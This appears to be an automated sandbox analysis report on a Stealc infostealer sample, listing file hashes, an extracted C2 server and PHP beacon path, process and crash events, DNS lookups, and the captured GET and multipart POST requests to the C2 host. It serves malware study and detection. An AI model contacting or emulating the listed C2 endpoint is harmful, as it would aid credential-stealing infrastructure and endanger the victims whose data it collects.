Analysis

  • max time kernel
    93s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-12-2024 12:24

General

  • Target

    ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe

  • Size

    289KB

  • MD5

    ea2c30769d298e35ba11cd5c5ed2b04f

  • SHA1

    e47bc5c3db4cfbc68dfbe6c48a88c87c29b38a13

  • SHA256

    ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8

  • SHA512

    5e8dd5244fd0c420c79aaf5c9aa7f112189696ae4f7caaa8082acff3e401df3d1d9f84ce4c8ef0c0a768fac4c2495afb192d72e40e2737b8144cb21adebaedb8

  • SSDEEP

    6144:UBM4zzQdbt97XKCVqSYkRYfeIUd+NHHDWn9mWhi:4M44dN3YWTITHDqBi

Malware Config

Extracted

Family

stealc

Botnet

LogsDiller

C2

http://185.219.81.132

Attributes
  • url_path

    /c3d039fb36c40339.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
    "C:\Users\Admin\AppData\Local\Temp\ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:3996
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1268
      2⤵
      • Program crash
      PID:1456
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1264
      2⤵
      • Program crash
      PID:376
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3996 -ip 3996
    1⤵
      PID:3392
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3996 -ip 3996
      1⤵
        PID:4516

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        241.150.49.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.150.49.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-nl
        GET
        http://185.219.81.132/
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        Remote address:
        185.219.81.132:80
        Request
        GET / HTTP/1.1
        Host: 185.219.81.132
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Sat, 21 Dec 2024 12:24:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-nl
        POST
        http://185.219.81.132/c3d039fb36c40339.php
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        Remote address:
        185.219.81.132:80
        Request
        POST /c3d039fb36c40339.php HTTP/1.1
        Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
        Host: 185.219.81.132
        Content-Length: 216
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Sat, 21 Dec 2024 12:24:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 8
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-us
        DNS
        132.81.219.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        132.81.219.185.in-addr.arpa
        IN PTR
        Response
        132.81.219.185.in-addr.arpa
        IN PTR
        185-219-81-132 netherlands-2vpsac
      • flag-us
        DNS
        134.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        134.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        200.163.202.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        200.163.202.172.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        140.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.71.91.104.in-addr.arpa
        IN PTR
        Response
        140.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-140deploystaticakamaitechnologiescom
      • flag-us
        DNS
        88.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        88.210.23.2.in-addr.arpa
        IN PTR
        Response
        88.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-88deploystaticakamaitechnologiescom
      • flag-us
        DNS
        22.236.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.236.111.52.in-addr.arpa
        IN PTR
        Response
      • 185.219.81.132:80
        http://185.219.81.132/c3d039fb36c40339.php
        http
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        822 B
        625 B
        7
        5

        HTTP Request

        GET http://185.219.81.132/

        HTTP Response

        200

        HTTP Request

        POST http://185.219.81.132/c3d039fb36c40339.php

        HTTP Response

        200
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        241.150.49.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        241.150.49.20.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        132.81.219.185.in-addr.arpa
        dns
        73 B
        122 B
        1
        1

        DNS Request

        132.81.219.185.in-addr.arpa

      • 8.8.8.8:53
        134.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        134.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        200.163.202.172.in-addr.arpa
        dns
        74 B
        160 B
        1
        1

        DNS Request

        200.163.202.172.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        140.71.91.104.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        140.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        88.210.23.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        88.210.23.2.in-addr.arpa

      • 8.8.8.8:53
        22.236.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        22.236.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3996-0-0x00000000001C0000-0x00000000001EB000-memory.dmp

        Filesize

        172KB

      • memory/3996-1-0x00000000022E0000-0x000000000231D000-memory.dmp

        Filesize

        244KB

      • memory/3996-2-0x0000000000400000-0x0000000000650000-memory.dmp

        Filesize

        2.3MB

      • memory/3996-5-0x00000000022E0000-0x000000000231D000-memory.dmp

        Filesize

        244KB

      • memory/3996-4-0x00000000001C0000-0x00000000001EB000-memory.dmp

        Filesize

        172KB

      • memory/3996-3-0x0000000000400000-0x0000000000650000-memory.dmp

        Filesize

        2.3MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.